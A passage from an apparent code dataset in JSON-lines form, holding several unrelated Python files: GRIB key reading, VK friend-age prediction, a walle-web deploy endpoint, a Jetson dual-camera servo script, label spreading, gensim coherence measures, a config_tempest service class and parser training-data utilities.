ecc.codes_keys_iterator_new(gid, namespace)\n\n # Different types of keys can be skipped\n if skipkeys:\n if 'computed' in skipkeys:\n ecc.codes_skip_computed(iterid)\n if 'coded' in skipkeys:\n ecc.codes_skip_coded(iterid)\n if 'edition' in skipkeys:\n ecc.codes_skip_edition_specific(iterid)\n if 'duplicates' in skipkeys:\n ecc.codes_skip_duplicates(iterid)\n if 'read_only' in skipkeys:\n ecc.codes_skip_read_only(iterid)\n if 'function' in skipkeys: \n ecc.codes_skip_function(iterid)\n \n data = OrderedDict()\n \n # iterate over message 
keys\n while ecc.codes_keys_iterator_next(iterid):\n\n\n keyname = ecc.codes_keys_iterator_get_name(iterid)\n #print(keyname)\n\n\n #print(\"Size:\", ecc.codes_get_size(gid, keyname))\n #print(\"Values:\", ecc.codes_get_values(gid, keyname))\n #print(\"Array:\", ecc.codes_get_values(gid, keyname))\n\n # try to get key values,\n # use get_array for sizes > 1 and get for sizes == 1\n if ecc.codes_get_size(gid,keyname) > 1:\n #print(\"has array\", type is str)\n #print(type is not )\n if ecc.codes_get_native_type(iterid, keyname) is not str:\n keyval = ecc.codes_get_array(gid, keyname, None)\n else:\n keyval = ecc.codes_get(gid, keyname, None)\n #print(\"Arr:\", keyval)\n else:\n # Todo: fix reading mybits\n if keyname not in ['mybits']:\n keyval = ecc.codes_get(gid, keyname, None)\n #print(\"Val:\", keyval)\n else:\n keyval = 'err'\n\n # add keyname-keyvalue-pair to output dictionary\n data[keyname] = keyval\n\n #print('Message processed')\n # release iterator\n ecc.codes_keys_iterator_delete(iterid)\n\n return data\n\nif __name__ == '__main__':\n print('miub: Calling module as main...')","sub_path":"miub_eccodes.py","file_name":"miub_eccodes.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"348557806","text":"import datetime as dt\nfrom statistics import median\nfrom typing import Optional\n\nfrom api import get_friends\n\n\ndef age_predict(user_id: int) -> Optional[float]:\n \"\"\" Наивный прогноз возраста по возрасту друзей\n Возраст считается как медиана среди возраста всех друзей пользователя\n :param user_id: идентификатор пользователя\n :return: медианный возраст пользователя\n \"\"\"\n assert isinstance(user_id, int), \"user_id must be positive integer\"\n assert user_id > 0, \"user_id must be positive integer\"\n\n friends = get_friends(user_id, 'bdate')\n if friends is None:\n return -1\n\n today = dt.datetime.now()\n ages = []\n\n for friend in friends:\n try:\n day, month, year = map(int, friend['bdate'].split('.'))\n bdate = dt.datetime(year, month, day)\n ages.append((today - bdate).days // 365)\n except:\n pass\n return median(ages)\n\n\nif __name__ == \"__main__\":\n print(age_predict(141602985))\n","sub_path":"homework05/age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"292468338","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n walle-web\n\n :copyright: © 2015-2017 walle-web.io\n :created time: 2017-03-25 11:15:01\n :author: wushuiyong@walle-web.io\n\"\"\"\n\nfrom flask import request, abort,current_app\nfrom walle.api.api import SecurityResource\nfrom walle.model.record import RecordModel\nfrom walle.model.task import TaskModel\nfrom walle.service.deployer import Deployer\n\n\nclass DeployAPI(SecurityResource):\n def get(self, task_id=None):\n \"\"\"\n fetch deploy list or one item\n /deploy/\n\n :return:\n \"\"\"\n super(DeployAPI, self).get()\n\n def put(self,task_id):\n \"\"\"\n update deploy\n /deploy/\n \"\"\"\n try:\n current_app.logger.info('-----------start a deploy with gitlab runner--------------')\n current_app.logger.info(task_id)\n task_info = TaskModel(id=task_id).item()\n wi = Deployer(task_id=task_id, console=False, api_trigger=True)\n deploy_status = False\n if task_info['is_rollback']:\n deploy_status = wi.walle_rollback()\n else:\n deploy_status = wi.walle_deploy()\n current_app.logger.info('-----------end deploy with gitlab 
runner--------------')\n\n return self.render_json(data=deploy_status)\n except Exception as e:\n current_app.logger.info(e)\n return self.render_error(code=2001, message='Deployment failed')\n \n ","sub_path":"walle/api/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285424404","text":"import cv2 as cv\nimport numpy as np\nimport time\nfrom adafruit_servokit import ServoKit\n\nprint(cv.__version__)\n\ntimeMark = time.time() # time stamp\ndtFIL = 0 # low-pass filter, tracks the time delta\n\nwidth = 640 # 800 640 1280 1920\nheight = 480 # 600 480 720 1080\nflip = 2 # set flip\n\nfont = cv.FONT_HERSHEY_SIMPLEX # set font\n\nkit = ServoKit(channels=16) # the servo driver has 16 channels\n\ntilt = 90 # tilt angle\npan = 90 # pan angle\n\ndTilt = 10 # movement step\ndPan = 1 # movement step\n\nkit.servo[0].angle = pan # pan servo - cam1\nkit.servo[1].angle = tilt # tilt servo - cam1\nkit.servo[2].angle = pan # pan servo - cam2\nkit.servo[3].angle = tilt # tilt servo - cam2\n\n# GStreamer is the pipeline from the camera source to the display sink\n\n# Raspberry Pi camera capture; commands are separated by !\n# flip-method=2 is normal, flip-method=0 flips the image\n# wbmode is the white balance mode, see gst-inspect-1.0 nvarguscamerasrc\n# tnr stands for temporal noise reduction\n# tnr-mode is the temporal noise reduction mode, see gst-inspect-1.0 nvarguscamerasrc\n# tnr-strength is the temporal noise reduction strength, see gst-inspect-1.0 nvarguscamerasrc\n# ee-mode is the edge enhancement mode, see gst-inspect-1.0 nvarguscamerasrc\n# ee-strength is the edge enhancement strength, see gst-inspect-1.0 nvarguscamerasrc\n# videobalance adjusts the video balance, contrast is the contrast, see gst-inspect-1.0 videobalance\n# brightness is the brightness, see gst-inspect-1.0 videobalance\n# saturation is the saturation, see gst-inspect-1.0 videobalance\n# camSet = 'nvarguscamerasrc sensor-id=0 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink' \n\n# drop=True eliminates latency\ncamSet1 = 'nvarguscamerasrc sensor-id=0 ee-mode=2 ee-strength=0 tnr-mode=3 tnr-strength=1 wbmode=3 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! videobalance contrast=1.5 brightness=-.15 saturation=1.2 ! appsink drop=True' \ncamSet2 = 'nvarguscamerasrc sensor-id=1 ee-mode=2 ee-strength=0 tnr-mode=3 tnr-strength=1 wbmode=3 ! video/x-raw(memory:NVMM), width=3264, height=2464, framerate=21/1, format=NV12 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(width)+', height='+str(height)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! videobalance contrast=1.5 brightness=-.15 saturation=1.2 ! appsink drop=True' \n\ncam1 = cv.VideoCapture(camSet1)\ncam2 = cv.VideoCapture(camSet2)\n# USB camera capture\n# method 1\n# cam3 = cv.VideoCapture('/dev/video0') \n# method 2, did not run successfully\n# camSet = 'v4l2src device=/dev/video0 ! video/x-raw, width='+str(width)+', height='+str(height)+', framerate=25/1 ! videoconvert ! appsink'\n# cam = cv.VideoCapture(camSet)\n\nwhile True:\n _, frame1 = cam1.read()\n _, frame2 = cam2.read()\n\n frame3 = np.hstack((frame1, frame2)) # combine frames 1 and 2\n dt = time.time() - timeMark # time delta\n timeMark = time.time() # new time stamp\n dtFIL = .9*dtFIL + .1*dt # low-pass filter\n fps = 1 / dtFIL # frames per second\n cv.rectangle(frame3, (0,0), (150,40), (0,0,255), -1) # draw a solid red rectangle in the top-left corner (blue, green, red)\n cv.putText(frame3, 'fps: '+str(round(fps,1)), (0,30), font, 1, (0,255,255), 2) # overlay the fps text, one decimal place, font size 1, yellow, thickness 2\n\n print(\"fps = \", fps)\n\n # cv.imshow('myCam1', frame1) # show image 1 in a window, sized to the image\n # cv.imshow('myCam2', frame2) # show image 2 in a window, sized to the image\n cv.imshow('comboCam', frame3) # show the combined image\n\n # cv.moveWindow('myCam1', 0, 0) # window position, top-left corner\n # cv.moveWindow('myCam2', 0, 500) # window position, moved down 500\n cv.moveWindow('comboCam', 0, 0) # window position, top-left corner\n\n kit.servo[0].angle = pan # pan servo - cam1\n kit.servo[2].angle = pan # pan servo - cam2\n pan = pan + dPan\n if pan >= 179 or pan <= 1:\n dPan = dPan * (-1)\n kit.servo[1].angle = tilt # tilt servo - cam1 \n kit.servo[3].angle = tilt # tilt servo - cam2\n tilt = tilt + dTilt # implements a scanning motion: pan first, then tilt\n if tilt >= 169 or tilt <= 11:\n dTilt = dTilt * (-1)\n\n\n if cv.waitKey(1) == ord('q'): # keyboard binding\n break\ncam1.release()\ncam2.release()\ncv.destroyAllWindows() # destroy all created windows\n","sub_path":"learn_jetson/OpenCV/OpenCV-4-dualCams.py","file_name":"OpenCV-4-dualCams.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194877726","text":"import pandas as pd\nimport argschema as ags\nimport drcme.tsne as tsne\nimport sklearn.semi_supervised as sm\nimport numpy as np\n\nclass ComboTsneParameters(ags.ArgSchema):\n spca_file_1 = ags.fields.InputFile()\n labels_file = ags.fields.InputFile()\n output_file = ags.fields.OutputFile()\n n_neighbours = ags.fields.Integer(default=80)\n gamma = ags.fields.Float(default=25)\n n_iter = ags.fields.Integer(default=20000)\n\n\ndef main(spca_file_1, labels_file, output_file,\n n_neighbours, gamma, n_iter, **kwargs):\n df_1 = pd.read_csv(spca_file_1, index_col=0).to_numpy()\n y_gt = pd.read_csv(labels_file, index_col=0).to_numpy().ravel()\n df_1 = df_1[:len(y_gt)]\n output_df = pd.DataFrame()\n print('Data loaded...')\n print('Spreading labels')\n prop = sm.LabelSpreading(kernel='knn', n_neighbors=n_neighbours, gamma=gamma, alpha=0.5, max_iter=n_iter, n_jobs=-1)\n prop.fit(df_1, y_gt)\n output = prop.transduction_.reshape(-1,1) \n output_prob = prop.predict_proba(df_1)\n output_dist = prop.label_distributions_\n output_pred = prop.predict(df_1).reshape(-1,1)\n np.savetxt(output_file, np.hstack((output,output_prob,output_dist, output_pred)), delimiter=',')\n\n\nif __name__ == \"__main__\":\n module = ags.ArgSchemaParser(schema_type=ComboTsneParameters)\n main(**module.args)\n","sub_path":"drcme/bin/run_label_prop_on_spca.py","file_name":"run_label_prop_on_spca.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"302938904","text":"import os\nfrom zipfile import ZipFile\n\nimport torch.utils.data\nfrom nltk.tree import Tree\n\nfrom algebras.algebra import Algebra\nfrom algebras.algebra import FreeTreeAlgebra\nfrom data_structures import int_trees as intree\nfrom interning import interning_tools\nfrom interning.interning_tools import Interner\nfrom interning.number_assignments import CountNumberAssignment\nfrom srsystem.srsystem import NoArityTopDownSRProblem\nfrom srsystem.srsystem import SRProblem\n\n\nclass ZipFileDataset(torch.utils.data.Dataset):\n \"\"\"\n Implements random access over examples from a Zipfile, this is then used for data loading with the pyTorch data\n management tools.\n \"\"\"\n\n def __init__(self, file, decoder):\n if isinstance(file, str):\n self.file = ZipFile(file, \"r\")\n else:\n self.file = file\n\n self.entries = self.file.namelist()\n self.decoder = decoder\n\n def close(self):\n self.file.close()\n\n def __getitem__(self, item):\n outer_list = []\n inner_list = []\n name = self.entries[item]\n lines = self.file.read(name).decode().strip().splitlines()\n\n for line in lines:\n inner_list.append(line.strip())\n if len(inner_list) > 2 and inner_list[-1] == \"\" and inner_list[-2] == \"\":\n outer_list.append(self.decoder(inner_list[:len(inner_list) - 2]))\n inner_list = []\n while len(inner_list) > 1:\n if inner_list[-1] == \"\":\n inner_list = inner_list[:len(inner_list) - 1]\n else:\n outer_list.append(self.decoder(inner_list))\n inner_list = []\n\n return outer_list\n\n def __len__(self):\n return len(self.entries)\n\n\ndef make_training_set(filename, algebra, is_stop):\n \"\"\"\n This creates a training set iterable from the files in the given file (path to a zipfile), assuming that operations\n will be taken from the given algebra and with is_stop indicating whether we are creating a stopping or choice\n training set.\n\n :param filename:\n :param algebra:\n :param is_stop:\n :return:\n \"\"\"\n\n if is_stop:\n decoder = lambda x: SRProblem.decode_stopping(x)\n else:\n decoder = lambda x: SRProblem.decode_choice(x)\n\n return 
ZipFileDataset(filename, decoder)\n\n\ndef make_data_iterator(configuration, filename, algebra, is_stop, shuffle):\n \"\"\"\n Creates a torch.DataLoader for the data in the named file. is_stop indicates whether we are creating a stopping or\n a choice training set.\n\n :param configuration: the parameters here are:\n batch_size -- the number of files in the zip that will be opened per for each batch\n num_loading_threads -- how many threads to use for loading more than 0 leads to an error right now\n :param filename:\n :param algebra:\n :param is_stop:\n :param shuffle:\n :return:\n \"\"\"\n\n batch_size = configuration[\"batch_size\"]\n workers = configuration[\"num_loading_threads\"]\n\n training_set = make_training_set(filename, algebra, is_stop)\n return torch.utils.data.DataLoader(dataset=training_set, shuffle=shuffle, batch_size=batch_size,\n num_workers=workers, collate_fn=collate)\n\n\ndef collate(x):\n result = []\n\n for sublist in x:\n for item in sublist:\n result.append(item)\n\n return result\n\n\ndef make_corpus(sentence_iterable):\n \"\"\"\n Reads in a corpus from the given iterable assume that every item returned by the iterable is a string that\n conforms to the nltk format for trees. Returns the corpus as an iterable of nltk.tree.Tree\n\n :param sentence_iterable:\n :return:\n \"\"\"\n corpus = []\n for line in sentence_iterable:\n corpus.append(Tree.fromstring(line))\n\n return corpus\n\n\ndef training_set_from_trees(count_cutoff: int, corpus, interner_file, algebra_file,\n choice_training_file, stop_training_file):\n \"\"\"\n This method returns a word interner and an algebra, it also writes both, as well as a training set into the given\n files.\n\n :param count_cutoff:\n :param corpus:\n :param interner_file:\n :param algebra_file:\n :param choice_training_file:\n :param stop_training_file:\n :return:\n \"\"\"\n word_count = {}\n for (i, tree) in enumerate(corpus):\n # here we count how often certain leaf nodes occur so we can enforce the count cut-offs\n count_leafs(tree, word_count)\n\n # some reporting to see progress\n if (i + 1) % 10 == 0:\n print(\n \"Processed instance number: \" + str(i + 1) + \" out of \" + str(len(corpus)) + \"instances. For counting \"\n \"occurrences.\")\n\n # now we create an interner based on the counts we observed\n word_interner = interning_tools.Interner(CountNumberAssignment(cut_off=count_cutoff, counts=word_count))\n node_set = set()\n\n for (i, tree) in enumerate(corpus):\n # now we add all the words and the nodes in order to then go on to create training examples\n add_entries(tree, node_set, word_interner)\n if (i + 1) % 10 == 0:\n print(\"Processed instance number: \" + str(i + 1) + \" out of \" + str(\n len(corpus)) + \" instances. For lexicon creation\")\n\n # now we create an algebra with the seen nodes\n algebra = FreeTreeAlgebra(word_interner, node_set)\n\n # time to write out the interners and the algebra\n interner_file.write(repr(word_interner))\n algebra_file.write(repr(algebra.action_interner))\n\n # now we create the training set\n create_training_instances(choice_training_file, corpus, stop_training_file, word_interner, algebra)\n\n # we return the interner and algebra in case calling methods want to use them to create further training sets\n return word_interner, algebra\n\n\nclass FakeWriteAble:\n \"\"\"\n This class is used to collect multiple write commands into a single string. 
The written strings are separated by\n 3 linesep\n \"\"\"\n\n def __init__(self):\n self.lines = []\n\n def get_string(self, reverse=True):\n return os.linesep.join(reversed(self.lines) if reverse else self.lines)\n\n def write(self, content):\n self.lines.append(content)\n\n\ndef create_training_instances(choice_training_file, corpus, stop_training_file, word_interner, algebra):\n \"\"\"\n This method iterates through the given corpus and adds all the training examples from it to the choice and stop\n training files via write operations. All examples from a singe tree are bunched into a single write operations.\n\n :param choice_training_file:\n :param corpus:\n :param stop_training_file:\n :param word_interner:\n :param algebra:\n :return:\n \"\"\"\n for i, tree in enumerate(corpus):\n # we go over trees and numbers, the numbers are used to keep track of progress\n\n # the fake writeable is intended to collect all the examples we create while processing a single tree\n st = FakeWriteAble()\n ch = FakeWriteAble()\n\n # first we need to obtain the actual words that we need to parse, encoded as ints\n words = intree.get_leafs(tree, word_interner)\n\n # now we create an instance of the problem in order to get representations of the different training steps\n # SYSTEM SPECIFIC\n system = NoArityTopDownSRProblem(words, word_interner, algebra)\n\n # this method actually goes through the nodes to add the different actions\n insert(tree, system, algebra, word_interner, ch, st)\n\n # there si always a stopping decision after we are done with the tree\n instance = system.encode_stopping(algebra, True)\n SRProblem.write_stopping(instance, st)\n\n choice_training_file.write(ch.get_string())\n stop_training_file.write(st.get_string())\n\n if (i + 1) % 10 == 0:\n print(\"Processed instance number: \" + str(i + 1) + \" out of \" + str(\n len(corpus)) + \" instances. 
For creating training\"\n \" data.\")\n\n\ndef insert(tree: Tree, system: SRProblem, alg: Algebra, interner: Interner,\n choice_training, stop_training):\n if system.is_final():\n instance = system.encode_stopping(alg, False)\n SRProblem.write_stopping(instance, stop_training)\n\n options = system.get_options()\n index = -1\n\n option = None\n\n if len(tree) < 1:\n index = options.index(alg.shift)\n option = alg.shift\n else:\n for option in options:\n index += 1\n if repr(option) == tree.label().strip():\n break\n\n instance = system.encode_choice(alg, options, index)\n SRProblem.write_choice(instance, choice_training)\n system.apply_operation(option)\n\n for child in tree:\n insert(child, system, alg, interner, choice_training, stop_training)\n\n if len(tree) > 0:\n options = system.get_options()\n index = -1\n for option in options:\n index += 1\n if str(option).strip() == \"Reduce\":\n break\n\n instance = system.encode_choice(alg, options, index)\n SRProblem.write_choice(instance, choice_training)\n system.apply_operation(option)\n\n\ndef add_entries(tree: Tree, node_set: set, word_interner: interning_tools.Interner):\n if len(tree) < 1:\n word_interner(tree.label())\n else:\n node_set.add(tree.label())\n for child in tree:\n add_entries(child, node_set, word_interner)\n\n\ndef count_leafs(tree: Tree, word_count: dict):\n if len(tree) == 0:\n label = tree.label()\n word_count[label] = word_count.get(label, 0) + 1\n else:\n for child in tree:\n count_leafs(child, word_count)\n\n\ndef extract_training_set(training_sentences: list, gold_operation_sequences: list,\n system_type, algebra: Algebra, interner: Interner, converter,\n include_stopping=True):\n choice_training = []\n stop_training = []\n\n for i in range(len(training_sentences)):\n problem = system_type(training_sentences[i], interner, algebra)\n gold = gold_operation_sequences[i]\n\n for op in gold:\n # handle finality training\n if problem.is_final() and include_stopping:\n stop_training.append(converter.encode_stopping(algebra, problem, False))\n\n choices = problem.get_options()\n pick = None\n for j in range(len(choices)):\n if str(choices[j]) == str(op):\n pick = j\n break\n\n choice_training.append(converter.encode_choice(algebra, problem, choices, pick))\n problem.apply_operation(op)\n\n if include_stopping:\n stop_training.append(converter.encode_stopping(algebra, problem, True))\n\n return choice_training, stop_training\n\n\ndef postorder(tree, map_to_op, overall: list):\n for child in tree.children:\n postorder(child, map_to_op, overall)\n overall.append(map_to_op(tree.node_label))\n\n\ndef preorder(tree, map_to_op, overall: list):\n overall.append(map_to_op(tree.node_label))\n for child in tree.children:\n postorder(child, map_to_op, overall)\n\n\ndef get_operations(trees, map_to_op, order=postorder):\n op_lists = []\n\n for tree in trees:\n overall = []\n order(tree, map_to_op, overall)\n op_lists.append(overall)\n\n return op_lists\n","sub_path":"learning/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"52536785","text":"# Copyright 2013 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport re\nimport urllib3\n\nfrom six.moves import urllib\n\nfrom config_tempest.constants import LOG\nMULTIPLE_SLASH = re.compile(r'/+')\n\n\nclass ServiceError(Exception):\n pass\n\n\nclass Service(object):\n def __init__(self, name, service_url, token, disable_ssl_validation,\n client=None):\n self.name = name\n self.service_url = service_url\n self.headers = {'Accept': 'application/json', 'X-Auth-Token': token}\n self.disable_ssl_validation = disable_ssl_validation\n self.client = client\n\n self.extensions = []\n self.versions = []\n\n def do_get(self, url, top_level=False, top_level_path=\"\"):\n parts = list(urllib.parse.urlparse(url))\n # 2 is the path offset\n if top_level:\n parts[2] = '/' + top_level_path\n\n parts[2] = MULTIPLE_SLASH.sub('/', parts[2])\n url = urllib.parse.urlunparse(parts)\n\n try:\n if self.disable_ssl_validation:\n urllib3.disable_warnings()\n http = urllib3.PoolManager(cert_reqs='CERT_NONE')\n else:\n http = urllib3.PoolManager()\n r = http.request('GET', url, headers=self.headers)\n except Exception as e:\n LOG.error(\"Request on service '%s' with url '%s' failed\",\n (self.name, url))\n raise e\n if r.status >= 400:\n raise ServiceError(\"Request on service '%s' with url '%s' failed\"\n \" with code %d\" % (self.name, url, r.status))\n return r.data\n\n def set_extensions(self):\n self.extensions = []\n\n def set_versions(self):\n self.versions = []\n\n def get_extensions(self):\n return self.extensions\n\n @staticmethod\n def get_service_name():\n \"\"\"Return the service name.\n\n This return a list because you can have different services for the\n same type, like volume, volumev2, volumev3\n \"\"\"\n return []\n\n def get_versions(self):\n \"\"\"Return the versions available for each service.\n\n This doesn't means tempestconf support all these versions. Only that\n the service have these api versions enabled.\n \"\"\"\n return self.versions\n\n def set_default_tempest_options(self, conf):\n pass\n\n def get_supported_versions(self):\n \"\"\"Return the versions supported by tempestconf.\n\n The server might have older or newer versions that could not be\n supported by tempestconf.\n \"\"\"\n return []\n\n def get_catalog(self):\n \"\"\"Return the catalog name of a service.\n\n Usually the catalog has the same name of the service, in some cases\n this is not true, like in volume, that we have volumev3 and volumev2\n for example.\n \"\"\"\n return self.name\n\n def get_feature_name(self):\n \"\"\"Return the name of service used in -feature-enabled.\n\n Some services have the -feature-enabled option in tempest, that\n diverges from the service name. 
The main example is object-store\n service where the -feature-enabled is object-storage.\n \"\"\"\n return self.name\n\n def get_service_extension_key(self):\n \"\"\"Return the extension key for a particular service\"\"\"\n return None\n\n def get_unversioned_service_name(self):\n \"\"\"Return name of service without versions.\n\n Some services are versioned like volumev2 and volumev3, we try to\n discover these services checking the supported versions, so we need\n to know the unversioned service name for this.\n The default value is the name of the service.\n \"\"\"\n return self.name\n\n\nclass VersionedService(Service):\n def set_versions(self, top_level=True):\n body = self.do_get(self.service_url, top_level=top_level)\n body = json.loads(body)\n self.versions = self.deserialize_versions(body)\n\n def deserialize_versions(self, body):\n versions = []\n for version in body['versions']:\n if version['status'] != \"DEPRECATED\":\n versions.append(version)\n return list(map(lambda x: x['id'], versions))\n\n def no_port_cut_url(self):\n # if there is no port defined, cut the url from version to the end\n u = urllib3.util.parse_url(self.service_url)\n url = self.service_url\n if u.port is None:\n found = re.findall(r'v\\d', url)\n if len(found) > 0:\n index = url.index(found[0])\n url = self.service_url[:index]\n return (url, u.port is not None)\n","sub_path":"config_tempest/services/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"611177003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2013 Radim Rehurek \n# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html\n\n\"\"\"\nThis module contains functions to compute direct confirmation on a pair of words or word subsets.\n\"\"\"\n\nimport logging\n\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nEPSILON = 1e-12 # Should be small. Value as suggested in paper.\n\n\ndef log_conditional_probability(segmented_topics, accumulator, with_std=False, with_support=False):\n \"\"\"\n This function calculates the log-conditional-probability measure\n which is used by coherence measures such as U_mass.\n This is defined as: m_lc(S_i) = log[(P(W', W*) + e) / P(W*)]\n\n Args:\n segmented_topics (list): Output from the segmentation module of the segmented\n topics. Is a list of list of tuples.\n accumulator: word occurrence accumulator from probability_estimation.\n with_std (bool): True to also include standard deviation across topic segment\n sets in addition to the mean coherence for each topic; default is False.\n with_support (bool): True to also include support across topic segments. 
The\n support is defined as the number of pairwise similarity comparisons were\n used to compute the overall topic coherence.\n\n Returns:\n list : of log conditional probability measure for each topic.\n \"\"\"\n topic_coherences = []\n num_docs = float(accumulator.num_docs)\n for s_i in segmented_topics:\n segment_sims = []\n for w_prime, w_star in s_i:\n try:\n w_star_count = accumulator[w_star]\n co_occur_count = accumulator[w_prime, w_star]\n m_lc_i = np.log(((co_occur_count / num_docs) + EPSILON) / (w_star_count / num_docs))\n except KeyError:\n m_lc_i = 0.0\n\n segment_sims.append(m_lc_i)\n\n topic_coherences.append(aggregate_segment_sims(segment_sims, with_std, with_support))\n\n return topic_coherences\n\n\ndef aggregate_segment_sims(segment_sims, with_std, with_support):\n \"\"\"Compute various statistics from the segment similarities generated via\n set pairwise comparisons of top-N word lists for a single topic.\n\n Args:\n segment_sims (iterable): floating point similarity values to aggregate.\n with_std (bool): Set to True to include standard deviation.\n with_support (bool): Set to True to include number of elements in `segment_sims`\n as a statistic in the results returned.\n\n Returns:\n tuple: with (mean[, std[, support]])\n \"\"\"\n mean = np.mean(segment_sims)\n stats = [mean]\n if with_std:\n stats.append(np.std(segment_sims))\n if with_support:\n stats.append(len(segment_sims))\n\n return stats[0] if len(stats) == 1 else tuple(stats)\n\n\ndef log_ratio_measure(\n segmented_topics, accumulator, normalize=False, with_std=False, with_support=False):\n \"\"\"\n If normalize=False:\n Popularly known as PMI.\n This function calculates the log-ratio-measure which is used by\n coherence measures such as c_v.\n This is defined as: m_lr(S_i) = log[(P(W', W*) + e) / (P(W') * P(W*))]\n\n If normalize=True:\n This function calculates the normalized-log-ratio-measure, popularly knowns as\n NPMI which is used by coherence measures such as c_v.\n This is defined as: m_nlr(S_i) = m_lr(S_i) / -log[P(W', W*) + e]\n\n Args:\n segmented_topics (list): Output from the segmentation module of the segmented\n topics. Is a list of list of tuples.\n accumulator: word occurrence accumulator from probability_estimation.\n with_std (bool): True to also include standard deviation across topic segment\n sets in addition to the mean coherence for each topic; default is False.\n with_support (bool): True to also include support across topic segments. 
The\n support is defined as the number of pairwise similarity comparisons were\n used to compute the overall topic coherence.\n\n Returns:\n list : of log ratio measure for each topic.\n \"\"\"\n topic_coherences = []\n num_docs = float(accumulator.num_docs)\n for s_i in segmented_topics:\n segment_sims = []\n for w_prime, w_star in s_i:\n w_prime_count = accumulator[w_prime]\n w_star_count = accumulator[w_star]\n co_occur_count = accumulator[w_prime, w_star]\n\n if normalize:\n # For normalized log ratio measure\n numerator = log_ratio_measure([[(w_prime, w_star)]], accumulator)[0]\n co_doc_prob = co_occur_count / num_docs\n m_lr_i = numerator / (-np.log(co_doc_prob + EPSILON))\n else:\n # For log ratio measure without normalization\n numerator = (co_occur_count / num_docs) + EPSILON\n denominator = (w_prime_count / num_docs) * (w_star_count / num_docs)\n m_lr_i = np.log(numerator / denominator)\n\n segment_sims.append(m_lr_i)\n\n topic_coherences.append(aggregate_segment_sims(segment_sims, with_std, with_support))\n\n return topic_coherences\n","sub_path":"home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/topic_coherence/direct_confirmation_measure.py","file_name":"direct_confirmation_measure.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194877726","text":"import pandas as pd\nimport argschema as ags\nimport drcme.tsne as tsne\nimport sklearn.semi_supervised as sm\nimport numpy as np\n\nclass ComboTsneParameters(ags.ArgSchema):\n spca_file_1 = ags.fields.InputFile()\n labels_file = ags.fields.InputFile()\n output_file = ags.fields.OutputFile()\n n_neighbours = ags.fields.Integer(default=80)\n gamma = ags.fields.Float(default=25)\n n_iter = ags.fields.Integer(default=20000)\n\n\ndef main(spca_file_1, labels_file, output_file,\n n_neighbours, gamma, n_iter, **kwargs):\n df_1 = pd.read_csv(spca_file_1, index_col=0).to_numpy()\n y_gt = pd.read_csv(labels_file, index_col=0).to_numpy().ravel()\n df_1 = df_1[:len(y_gt)]\n output_df = pd.DataFrame()\n print('Data loaded...')\n print('Spreading labels')\n prop = sm.LabelSpreading(kernel='knn', n_neighbors=n_neighbours, gamma=gamma, alpha=0.5, max_iter=n_iter, n_jobs=-1)\n prop.fit(df_1, y_gt)\n output = prop.transduction_.reshape(-1,1) \n output_prob = prop.predict_proba(df_1)\n output_dist = prop.label_distributions_\n output_pred = prop.predict(df_1).reshape(-1,1)\n np.savetxt(output_file, np.hstack((output,output_prob,output_dist, output_pred)), delimiter=',')\n\n\nif __name__ == \"__main__\":\n module = ags.ArgSchemaParser(schema_type=ComboTsneParameters)\n main(**module.args)\n","sub_path":"drcme/bin/run_label_prop_on_spca.py","file_name":"run_label_prop_on_spca.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"173220833","text":"import bencode\nimport fsys\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport telnet\nimport time\nimport torrent\nimport torrentcheck\nfrom tempfile import gettempdir\n\nif os.environ.get('HOSTNAME') != 'a1':\n import gui_copy\n import tm\n\n\ndef get_local_name(fn):\n if fn[:4] == '/b6/' or fn == '/b6':\n return 'a1', fn\n if fn[:4] == '/b7/' or fn == '/b7':\n return 'a1', fn\n if fn[:4] == '/b8/' or fn == '/b8':\n return 'a1', fn\n if fn[:4] == '/b9/' or fn == '/b9':\n return 'a1', fn\n if fn[:13] == '/home/yc/a4a/':\n return 'a4', '/aa/' + fn[13:]\n if fn[:13] == 
